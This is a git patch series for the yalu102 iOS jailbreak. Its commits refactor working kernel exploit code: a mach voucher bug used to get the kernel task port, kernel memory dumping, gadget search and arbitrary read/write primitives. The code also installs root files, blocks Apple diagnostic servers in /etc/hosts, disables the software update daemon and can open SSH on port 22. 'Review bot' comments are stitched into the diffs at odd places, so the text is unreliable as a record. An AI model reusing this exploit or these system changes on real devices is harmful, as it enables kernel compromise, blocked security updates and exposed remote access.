From 35176c7c2bf2a9b8e554e7e13e415b1eceb921eb Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 18:17:01 +0100 Subject: [PATCH 26/34] =?UTF-8?q?Don=E2=80=99t=20change=20mode=20of=20Pref?= =?UTF-8?q?erences=20directory?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- yalu102/jailbreak.m | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index e29de8f..ebfa1ab 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -800,11 +800,14 @@ void jailbreak(void) "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } } + + /* chmod("/private", 0777); chmod("/private/var", 0777); chmod("/private/var/mobile", 0777); chmod("/private/var/mobile/Library", 0777); chmod("/private/var/mobile/Library/Preferences", 0777); + */ system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); From cc0d834be6565e633d1c3ae68e2e9138649c708b Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 23:54:35 +0100 Subject: [PATCH 27/34] Cut down compiler warning noise --- yalu102.xcodeproj/project.pbxproj | 2 + yalu102/jailbreak.m | 208 ++++++++++++++---------------- 2 files changed, 101 insertions(+), 109 deletions(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 480d597..6a6dc82 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -381,6 +381,7 @@ ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; + GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; HEADER_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102/include", @@ -402,6 +403,7 @@ ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; + GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; HEADER_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102/include", 
diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m
index a1fb15f..0781580 100644
--- a/yalu102/jailbreak.m
+++ b/yalu102/jailbreak.m
@@ -31,13 +31,6 @@
 uint64_t allprocs_offset;
 uint64_t rootvnode_offset;
-io_connect_t funcconn=0;
-
-uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2)
-{
- return IOConnectTrap4(funcconn, 0, x1, x2, x0, addr);
-}
-
 void copyin(void* to, uint64_t from, size_t size) {
 mach_vm_size_t outsize = size;
 size_t szt = size;
@@ -56,7 +49,6 @@ void copyin(void* to, uint64_t from, size_t size) {
 if (size > 0x1000) {
 size = 0x1000;
 }
-
 }
 }
@@ -88,8 +80,7 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) {
 #import "pte_stuff.h"
-void jailbreak(void)
-{
+void jailbreak(void) {
 NSLog(@"jailbreaking using:");
 NSLog(@"tfp0 = %x", tfp0);
 NSLog(@"kernbase = %llx", kernbase);
@@ -97,13 +88,6 @@ void jailbreak(void)
 NSLog(@"allprocs_offset = %llx", allprocs_offset);
 NSLog(@"rootvnode_offset = %llx", rootvnode_offset);
- io_iterator_t iterator;
- IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator);
- io_object_t servicex = IOIteratorNext(iterator);
- funcconn = 0;
- IOServiceOpen(servicex, mach_task_self(), 0, &funcconn);
- assert(funcconn);
-
 uint64_t bsd_task=0;
 uint64_t launchd_task = 0;
 {
@@ -146,41 +130,42 @@ void jailbreak(void)
 checkvad();
- vm_address_t vmd = 0;
+ mach_vm_offset_t vmd = 0;
 _kernelrpc_mach_vm_allocate_trap(mach_task_self(), &vmd, 0x4000, VM_FLAGS_ANYWHERE);
 copyin((void*)vmd, kernbase, 0x4000);
- struct mach_header_64* vmk = vmd;
+ struct mach_header_64* vmk = (struct mach_header_64*)vmd;
 uint64_t max = 0;
 uint64_t min = -1;
- struct load_command* lc = vmk+1;
+ struct load_command* lc = (struct load_command*)(vmk + 1);
 for (int k=0; k < vmk->ncmds; k++) {
-
 if (lc->cmd == LC_SEGMENT_64) {
- struct segment_command_64* sg = lc;
+ struct segment_command_64* sg = (struct segment_command_64*)lc;
 NSLog(@"seg: %s", sg->segname);
 if (sg->vmaddr < min) {
 min = sg->vmaddr;
 }
 if (sg->vmaddr + sg->vmsize > max) {
- max = sg->vmaddr+sg->vmsize;
+ max = sg->vmaddr + sg->vmsize;
 }
 }
- lc = ((char*)lc) + lc->cmdsize;
+ lc = (struct load_command*)(((char*)lc) + lc->cmdsize);
 }
+
+ size_t kernsize = (size_t)(max - min);
- NSLog(@"%llx - %llx", min, max);
+ NSLog(@"%llx - %llx = %zx", min, max, kernsize);
- char* kdump = malloc(max-min);
+ char* kdump = malloc(kernsize);
- for (int k=0; k < (max-min)/0x4000; k++) {
+ for (int k=0; k < kernsize/0x4000; k++) {
 copyin(kdump+k*0x4000, min+k*0x4000, 0x4000);
 }
- NSLog(@"%llx", kdump);
+ NSLog(@"%zx", (uintptr_t)kdump);
 uint64_t kerndumpsize = 0;
 uint64_t gadget_base = 0;
 uint64_t gadget_size = 0;
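Review bot: `char* kdump = malloc(kernsize);` is still unchecked, and the results of `_kernelrpc_mach_vm_allocate_trap` and `copyin` are ignored, so an allocation failure turns the following `copyin(kdump+k*0x4000, ...)` loop into writes through a null pointer. `kernsize/0x4000` also truncates: when `max - min` is not a multiple of 0x4000 the last partial page is never copied, although `kdump` is later indexed relative to `min` (the `gadget_base - min + kdump` cast further down), so round the size up before allocating, `size_t kernsize = (size_t)((max - min + 0x3fff) & ~(uint64_t)0x3fff);`, and the loop then covers every page without overrunning the buffer. `NSLog(@"%zx", (uintptr_t)kdump)` pairs a `size_t` conversion with a `uintptr_t` argument; `NSLog(@"%p", kdump)` is the exact form, and `k` should be a `size_t` to match the bound it is compared against. `jailbreak()` continues on both sides of the hunk.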
@@ -215,10 +200,10 @@ void jailbreak(void) kerndumpsize += seg->vmsize; } else if (load_cmd->cmd == LC_UNIXTHREAD) { struct { - unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ - unsigned long cmdsize; /* total size of this command */ + unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ + unsigned long cmdsize; /* total size of this command */ unsigned long flavor; /* flavor of thread state */ - unsigned long count; /* count of longs in thread state */ + unsigned long count; /* count of longs in thread state */ struct { __uint64_t __x[29]; /* General purpose registers x0-x28 */ __uint64_t __fp; /* Frame pointer x29 */ @@ -228,7 +213,7 @@ void jailbreak(void) __uint32_t __cpsr; /* Current program status register */ __uint32_t __pad; /* Same size for 32-bit or 64-bit clients */ } state; - } * thr = load_cmd; + } * thr = (void*)load_cmd; entryp = thr->state.__pc; } @@ -246,9 +231,15 @@ void jailbreak(void) entryp += slide; uint64_t rvbar = entryp & (~0xFFF); - uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x40, text_exec_base, 1); + uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), + rvbar - gadget_base + 0x40, + text_exec_base, + 1); - uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x50, text_exec_base, 20); + uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), + rvbar - gadget_base + 0x50, + text_exec_base, + 20); if (uref) { optr = ReadAnywhere64(optr) - gPhysBase + gVirtBase; } @@ -261,9 +252,8 @@ void jailbreak(void) NSLog(@"pmap: %llx", pmap_store); level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); - - - + + uint64_t shellcode = physalloc(0x4000); /* @@ -455,7 +445,7 @@ void jailbreak(void) */ int cpacr_idx = 0; - uint32_t* opps = gadget_base - min + kdump; + uint32_t* opps = (uint32_t*)(gadget_base - min + kdump); while (1) { if (opps[cpacr_idx] == 0xd5181040) { 
@@ -745,82 +735,82 @@ void jailbreak(void) } { - char path[256]; - uint32_t size = sizeof(path); - _NSGetExecutablePath(path, &size); - char* pt = realpath(path, 0); - - { - __block pid_t pd = 0; - NSString* execpath = [[NSString stringWithUTF8String:pt] stringByDeletingLastPathComponent]; + NSBundle *resBundle = [NSBundle mainBundle]; + pid_t tmp_pid; + const char** tmp_args; + + int installedFd = open("/.installed_yaluX", O_RDONLY); + + if (installedFd == -1) { + NSString* tarPath = [resBundle pathForResource:@"tar" ofType:nil]; + NSString* bootstrapTarPath = [resBundle pathForResource:@"bootstrap.tar" ofType:nil]; + + unlink("/bin/tar"); + unlink("/bin/launchctl"); + + copyfile([tarPath UTF8String], "/bin/tar", 0, 0); + chmod("/bin/tar", 0755); + chown("/bin/tar", 0, 0); + + tmp_args = (const char*[]){ + "/bin/tar", + "--preserve-permissions", + "--no-overwrite-dir", + "-C /", + "-xvf", + [bootstrapTarPath UTF8String], + NULL + }; + posix_spawn(&tmp_pid, "/bin/tar", NULL, NULL, (char**)tmp_args, NULL); + waitpid(tmp_pid, 0, 0); + NSString* launchctlPath = [resBundle pathForResource:@"launchctl" ofType:nil]; + copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, 0); + chmod("/bin/launchctl", 0755); + chown("/bin/launchctl", 0, 0); - int f = open("/.installed_yaluX", O_RDONLY); - - if (f == -1) { - NSString* tar = [execpath stringByAppendingPathComponent:@"tar"]; - NSString* bootstrap = [execpath stringByAppendingPathComponent:@"bootstrap.tar"]; - const char* jl = [tar UTF8String]; - - unlink("/bin/tar"); - unlink("/bin/launchctl"); - - copyfile(jl, "/bin/tar", 0, COPYFILE_ALL); - chmod("/bin/tar", 0755); - jl="/bin/tar"; // - - chdir("/"); - - posix_spawn(&pd, jl, 0, 0, (char**)&(const char*[]){jl, "--preserve-permissions", "--no-overwrite-dir", "-xvf", [bootstrap UTF8String], NULL}, NULL); - NSLog(@"pid = %x", pd); - waitpid(pd, 0, 0); - - - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"launchctl"]; - jl = [jlaunchctl UTF8String]; - - 
copyfile(jl, "/bin/launchctl", 0, COPYFILE_ALL); - chmod("/bin/launchctl", 0755); - - open("/.installed_yaluX", O_RDWR|O_CREAT); - open("/.cydia_no_stash",O_RDWR|O_CREAT); - - - system("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts"); - system("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts"); - - system("/usr/bin/uicache"); - - system("killall -SIGSTOP cfprefsd"); - NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; - - [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; - - [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; - system("killall -9 cfprefsd"); - - } - { - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"]; - const char* jl = [jlaunchctl UTF8String]; - unlink("/usr/libexec/reload"); - copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL); - chmod("/usr/libexec/reload", 0755); - chown("/usr/libexec/reload", 0, 0); - - } - { - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"]; - const char* jl = [jlaunchctl UTF8String]; - unlink("/Library/LaunchDaemons/0.reload.plist"); - copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); - chmod("/Library/LaunchDaemons/0.reload.plist", 0644); - chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); + close(open("/.installed_yaluX", O_RDWR|O_CREAT)); + close(open("/.cydia_no_stash", O_RDWR|O_CREAT)); + + int hostsFd = open("/etc/hosts", O_RDWR|O_APPEND); + if (hostsFd != -1) { + const char *s; + s = "127.0.0.1 iphonesubmissions.apple.com\n" + "127.0.0.1 radarsubmissions.apple.com\n"; + write(hostsFd, s, strlen(s)); + close(hostsFd); } - rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", - "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); + system("/usr/bin/uicache"); + + system("killall -SIGSTOP 
cfprefsd"); + NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; + [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; + [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; + system("killall -9 cfprefsd"); + } + else { + close(installedFd); + } + + { + NSString* reloadPath = [resBundle pathForResource:@"reload" ofType:nil]; + unlink("/usr/libexec/reload"); + copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, 0); + chmod("/usr/libexec/reload", 0755); + chown("/usr/libexec/reload", 0, 0); } + + { + NSString* reloadPlistPath = [resBundle pathForResource:@"0.reload.plist" ofType:nil]; + unlink("/Library/LaunchDaemons/0.reload.plist"); + copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, 0); + chmod("/Library/LaunchDaemons/0.reload.plist", 0644); + chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); + } + + rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", + "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } /* From fd768e933876073da5a1c63fade14e1d84964765 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 00:49:33 +0100 Subject: [PATCH 28/34] Cosmetics --- yalu102/jailbreak.m | 24 ++++++++---------------- 1 file changed, 8 insertions(+), 16 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index a910048..a98a03e 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -810,7 +810,7 @@ void jailbreak(void) { unlink("/bin/tar"); unlink("/bin/launchctl"); - copyfile([tarPath UTF8String], "/bin/tar", 0, 0); + copyfile([tarPath UTF8String], "/bin/tar", 0, COPYFILE_ALL); chmod("/bin/tar", 0755); chown("/bin/tar", 0, 0); 
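Review bot: `close(open("/.installed_yaluX", O_RDWR|O_CREAT));` and the `/.cydia_no_stash` line pass `O_CREAT` without the mode argument, so the files are created with whatever value happens to be in the variadic slot (undefined behaviour) and may come out world-writable; pass it explicitly, `close(open("/.installed_yaluX", O_RDWR|O_CREAT, 0644));`. The marker is also created whether or not the bootstrap extraction worked: `posix_spawn`'s return and the `waitpid` status are never inspected, so a failed `tar` run is recorded as installed and never retried. Inspect the status first, `int st = 0; waitpid(tmp_pid, &st, 0); if (!WIFEXITED(st) || WEXITSTATUS(st) != 0) { NSLog(@"bootstrap extraction failed: %d", st); }`, and write the markers only on success. The `write(hostsFd, s, strlen(s))` result is likewise dropped, and a short write would leave a truncated entry in `/etc/hosts`. This block belongs to `jailbreak()`, which continues beyond the hunk.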
@@ -818,7 +818,7 @@ void jailbreak(void) { "/bin/tar", "--preserve-permissions", "--no-overwrite-dir", - "-C /", + "-C", "/", "-xvf", [bootstrapTarPath UTF8String], NULL @@ -827,7 +827,7 @@ void jailbreak(void) { waitpid(tmp_pid, 0, 0); NSString* launchctlPath = [resBundle pathForResource:@"launchctl" ofType:nil]; - copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, 0); + copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, COPYFILE_ALL); chmod("/bin/launchctl", 0755); chown("/bin/launchctl", 0, 0); @@ -850,6 +850,9 @@ void jailbreak(void) { [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; system("killall -9 cfprefsd"); + + rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", + "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } else { close(installedFd); @@ -858,7 +861,7 @@ void jailbreak(void) { { NSString* reloadPath = [resBundle pathForResource:@"reload" ofType:nil]; unlink("/usr/libexec/reload"); - copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, 0); + copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, COPYFILE_ALL); chmod("/usr/libexec/reload", 0755); chown("/usr/libexec/reload", 0, 0); } 
@@ -866,22 +869,11 @@ void jailbreak(void) { { NSString* reloadPlistPath = [resBundle pathForResource:@"0.reload.plist" ofType:nil]; unlink("/Library/LaunchDaemons/0.reload.plist"); - copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, 0); + copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); chmod("/Library/LaunchDaemons/0.reload.plist", 0644); chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); } - - rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", - "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } - - /* - chmod("/private", 0777); - chmod("/private/var", 0777); - chmod("/private/var/mobile", 0777); - chmod("/private/var/mobile/Library", 0777); - chmod("/private/var/mobile/Library/Preferences", 0777); - */ system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); From 698b0049b5f5e12bea4a227677969a49169eb9a6 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 02:09:12 +0100 Subject: [PATCH 29/34] Cosmetics --- yalu102/YAExploitTFP0.m | 9 +++------ yalu102/jailbreak.m | 6 ++---- 2 files changed, 5 insertions(+), 10 deletions(-) diff --git a/yalu102/YAExploitTFP0.m b/yalu102/YAExploitTFP0.m index 712b0fb..c8dfc0d 100644 --- a/yalu102/YAExploitTFP0.m +++ b/yalu102/YAExploitTFP0.m @@ -87,8 +87,6 @@ #define IKOT_IOKIT_CONNECT 29 #define IKOT_CLOCK 25 -char dt[128]; - @implementation YAExploitTFP0 + (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets 
@@ -97,14 +95,13 @@ + (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets { const uint64_t procoff = offsets->procoff; - mach_port_t vch = 0; - mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); data->content_size = 0; - data->key=MACH_VOUCHER_ATTR_KEY_BANK; - data->command=610; + data->key = MACH_VOUCHER_ATTR_KEY_BANK; + data->command = 610; data->previous_voucher=MACH_PORT_NULL; + mach_port_t vch = 0; kern_return_t lol = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)data, sizeof(mach_voucher_attr_recipe_data_t), diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index a98a03e..72b057d 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -805,15 +805,12 @@ void jailbreak(void) { if (installedFd == -1) { NSString* tarPath = [resBundle pathForResource:@"tar" ofType:nil]; - NSString* bootstrapTarPath = [resBundle pathForResource:@"bootstrap.tar" ofType:nil]; - unlink("/bin/tar"); - unlink("/bin/launchctl"); - copyfile([tarPath UTF8String], "/bin/tar", 0, COPYFILE_ALL); chmod("/bin/tar", 0755); chown("/bin/tar", 0, 0); + NSString* bootstrapTarPath = [resBundle pathForResource:@"bootstrap.tar" ofType:nil]; tmp_args = (const char*[]){ "/bin/tar", "--preserve-permissions", @@ -827,6 +824,7 @@ void jailbreak(void) { waitpid(tmp_pid, 0, 0); NSString* launchctlPath = [resBundle pathForResource:@"launchctl" ofType:nil]; + unlink("/bin/launchctl"); copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, COPYFILE_ALL); chmod("/bin/launchctl", 0755); chown("/bin/launchctl", 0, 0); From a097cdd38bafc10485dd2d955178afe4383d06be Mon Sep 17 00:00:00 2001 From: Aaahh Ahh Date: Sun, 29 Jan 2017 21:39:24 -0500 Subject: [PATCH 30/34] Travis Support --- .travis.yml | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 .travis.yml diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000..58b8265 --- /dev/null +++ b/.travis.yml 
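Review bot: `data->previous_voucher=MACH_PORT_NULL;` keeps the unspaced assignment while the two lines above it were just normalized to `data->key = ...` and `data->command = ...`; since the commit is purely cosmetic, normalize this one too, `data->previous_voucher = MACH_PORT_NULL;`. Moving `mach_port_t vch = 0;` next to its first use is a good change, but `malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10)` directly above is still dereferenced without a NULL check, and the `0x10` tail should carry a comment saying what it reserves. The enclosing method continues outside the hunk.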
@@ -0,0 +1,4 @@ +osx_image: xcode8.1 +language: objective-c +script: +- set -o pipefail && xcodebuild build -project yalu102.xcodeproj -xcconfig yalu102.xcconfig -configuration Debug CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO | xcpretty From a9ee05a100f4d2e83dc51f2e87ba39612a8d018d Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 15:18:31 +0100 Subject: [PATCH 31/34] Enable ARC --- yalu102.xcodeproj/project.pbxproj | 2 -- yalu102/ViewController.h | 4 +--- yalu102/ViewController.m | 15 ++++++++------- 3 files changed, 9 insertions(+), 12 deletions(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index a774a7f..7cbec97 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -384,7 +384,6 @@ buildSettings = { ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; - CLANG_ENABLE_OBJC_ARC = NO; GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; HEADER_SEARCH_PATHS = ( "$(inherited)", @@ -406,7 +405,6 @@ buildSettings = { ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; - CLANG_ENABLE_OBJC_ARC = NO; GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; HEADER_SEARCH_PATHS = ( "$(inherited)", diff --git a/yalu102/ViewController.h b/yalu102/ViewController.h index 1cee99c..d7c93d5 100644 --- a/yalu102/ViewController.h +++ b/yalu102/ViewController.h @@ -8,9 +8,7 @@ #import -@interface ViewController : UIViewController { - IBOutlet UIButton *dope; -} +@interface ViewController : UIViewController - (IBAction)yolo:(id)sender; diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index fc3dba8..8440a41 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m @@ -15,6 +15,7 @@ @interface ViewController () @property (nonatomic, strong) YAKernelOffsets *offsets; +@property (nonatomic, weak) IBOutlet UIButton *dope; @end 
@@ -26,15 +27,15 @@ - (void)viewDidLoad { struct utsname u = { 0 }; uname(&u); if (strstr(u.version, "MarijuanARM")) { - [dope setEnabled:NO]; - [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + [self.dope setEnabled:NO]; + [self.dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; return; } self.offsets = [YAKernelOffsets offsetsForCurrentDevice]; if (!self.offsets) { - [dope setEnabled:NO]; - [dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled]; + [self.dope setEnabled:NO]; + [self.dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled]; return; } } @@ -54,11 +55,11 @@ - (IBAction)yolo:(UIButton*)sender { rootvnode_offset = self.offsets->rootvnode_offset; jailbreak(); - [dope setEnabled:NO]; - [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + [self.dope setEnabled:NO]; + [self.dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; } else { - [dope setTitle:@"failed, retry?" forState:UIControlStateNormal]; + [self.dope setTitle:@"failed, retry?" forState:UIControlStateNormal]; } } From f072235e684be0ed8ec9acf615a7c6f16b4518c6 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 15:51:03 +0100 Subject: [PATCH 32/34] Add switch for enabling remote SSH access --- yalu102/Base.lproj/Main.storyboard | 51 ++++++++++++++++++++++++++---- yalu102/ViewController.m | 23 +++++++++++--- yalu102/jailbreak.h | 2 ++ yalu102/jailbreak.m | 9 ++++++ 4 files changed, 73 insertions(+), 12 deletions(-) diff --git a/yalu102/Base.lproj/Main.storyboard b/yalu102/Base.lproj/Main.storyboard index 0b7bd8a..5dee59f 100644 --- a/yalu102/Base.lproj/Main.storyboard +++ b/yalu102/Base.lproj/Main.storyboard @@ -1,6 +1,6 @@ - - + + @@ -19,11 +19,11 @@ - + + + + - + + + diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index 8440a41..86dc1e1 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m 
@@ -16,6 +16,8 @@ @interface ViewController ()
 @property (nonatomic, strong) YAKernelOffsets *offsets;
 @property (nonatomic, weak) IBOutlet UIButton *dope;
+@property (nonatomic, weak) IBOutlet UIView *sshView;
+@property (nonatomic, weak) IBOutlet UISwitch *sshSwitch;
 @end
@@ -38,6 +40,13 @@ - (void)viewDidLoad {
 [self.dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled];
 return;
 }
+
+ // load settings
+ {
+ NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];
+ [self.sshSwitch setOn:[defaults boolForKey:@"YAEnableRemoteSSH"]];
+ [self.sshView setHidden:NO];
+ }
 }
 - (IBAction)yolo:(UIButton*)sender {
@@ -47,25 +56,29 @@ - (IBAction)yolo:(UIButton*)sender {
 taskPortResult:&_tfp0
 kernelBaseResult:&_kernbase];
 if (ok) {
+ // store settings
+ {
+ NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];
+ [defaults setBool:self.sshSwitch.on forKey:@"YAEnableRemoteSSH"];
+ [defaults synchronize];
+ }
+
 // via jailbreak.h
 tfp0 = _tfp0;
 kernbase = _kernbase;
 slide = kernbase - 0xFFFFFFF007004000;
 allprocs_offset = self.offsets->allproc_offset;
 rootvnode_offset = self.offsets->rootvnode_offset;
+ cfg_enable_remote_ssh = self.sshSwitch.on;
 jailbreak();
 [self.dope setEnabled:NO];
 [self.dope setTitle:@"already jailbroken" forState:UIControlStateDisabled];
+ [self.sshView setHidden:YES];
 } else {
 [self.dope setTitle:@"failed, retry?" forState:UIControlStateNormal];
 }
 }
-- (void)didReceiveMemoryWarning {
- [super didReceiveMemoryWarning];
- // Dispose of any resources that can be recreated.
-}
-
 @end
diff --git a/yalu102/jailbreak.h b/yalu102/jailbreak.h
index 591864a..735df7f 100644
--- a/yalu102/jailbreak.h
+++ b/yalu102/jailbreak.h
@@ -1,6 +1,7 @@
 #pragma once
+#import
 #import
 #import
@@ -9,5 +10,6 @@
 extern uint64_t kernbase;
 extern uint64_t slide;
 extern uint64_t allprocs_offset;
 extern uint64_t rootvnode_offset;
+extern bool cfg_enable_remote_ssh;
 void jailbreak(void);
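Review bot: `extern bool cfg_enable_remote_ssh;` in the jailbreak.h hunk is added without a comment saying who sets it or what it changes, and unlike the offset globals above it alters what the jailbreak does to the device; a line such as `// set by the UI before calling jailbreak(): when true the installed dropbear launchd plist is rewritten so the SSH daemon accepts remote connections` would spare the next reader a trip through jailbreak.m. The only writer visible here is `cfg_enable_remote_ssh = self.sshSwitch.on;` in the ViewController hunk, immediately before `jailbreak();`, which the comment should name as the expected call order. The target of the new `#import` line is not visible in this rendering, so it cannot be checked against the `bool` use.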
diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m
index b6fd8a9..7b3b6b0 100644
--- a/yalu102/jailbreak.m
+++ b/yalu102/jailbreak.m
@@ -30,6 +30,7 @@
 uint64_t kernbase;
 uint64_t allprocs_offset;
 uint64_t rootvnode_offset;
+bool cfg_enable_remote_ssh;
 void copyin(void* to, uint64_t from, size_t size) {
 mach_vm_size_t outsize = size;
@@ -901,6 +902,14 @@ void jailbreak(void) {
 copyfile([dropbearPlistPath UTF8String], "/Library/LaunchDaemons/dropbear.plist", 0, COPYFILE_ALL);
 chmod("/Library/LaunchDaemons/dropbear.plist", 0644);
 chown("/Library/LaunchDaemons/dropbear.plist", 0, 0);
+ if (cfg_enable_remote_ssh) {
+ NSLog(@"enabling SSH remote access");
+ NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/Library/LaunchDaemons/dropbear.plist"];
+ NSMutableArray *a = [NSMutableArray arrayWithArray:[md valueForKey:@"ProgramArguments"]];
+ a[4] = @"22";
+ [md setValue:a forKey:@"ProgramArguments"];
+ [md writeToFile:@"/Library/LaunchDaemons/dropbear.plist" atomically:YES];
+ }
 }
 }
From b7a300f9e5d1cb0b395cee5eacb3254e4b306f86 Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Mon, 30 Jan 2017 15:58:19 +0100
Subject: [PATCH 33/34] Reenable original OTA patch
---
 yalu102/jailbreak.m | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)
diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m
index 7b3b6b0..82e9c07 100644
--- a/yalu102/jailbreak.m
+++ b/yalu102/jailbreak.m
@@ -821,12 +821,17 @@ void jailbreak(void) {
 }
 {
+ /*
+ persistent filesystem modifications
+ */
+
 NSBundle *resBundle = [NSBundle mainBundle];
 pid_t tmp_pid;
 const char** tmp_args;
 int installedFd = open("/.installed_yaluX", O_RDONLY);
